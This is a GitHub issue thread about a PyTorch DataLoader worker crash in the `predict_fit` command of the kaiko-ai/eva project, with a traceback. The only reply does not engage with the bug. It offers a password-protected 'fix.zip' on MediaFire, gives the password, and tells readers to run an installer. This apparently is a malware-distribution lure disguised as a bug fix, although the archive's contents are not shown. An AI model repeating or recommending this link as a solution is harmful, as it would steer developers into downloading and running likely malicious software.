### ISSUE TITLE
DataLoader worker issue in `predict_fit` for segmentation datasets

### ISSUE THREAD

**Issue by nkaenzig** [kaiko-ai/eva#620]
Getting the following error, when running segmentation tasks like consep & monusac:

```
Traceback (most recent call last):
  File "/home/ray/anaconda3/lib/python3.10/site-packages/torch/utils/data/dataloader.py", line 1133, in _try_get_data
    data = self._data_queue.get(timeout=timeout)
  File "/home/ray/anaconda3/lib/python3.10/queue.py", line 179, in get
    raise Empty
_queue.Empty

RuntimeError: DataLoader worker (pid(s) 3236, 3237, 3238) exited unexpectedly
```

This only happens on linux machines with A100 GPUs, not locally (MacOS & M1 chip).
Also only happens with the `predict_fit` command, running `predict` & `fit` separately works.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
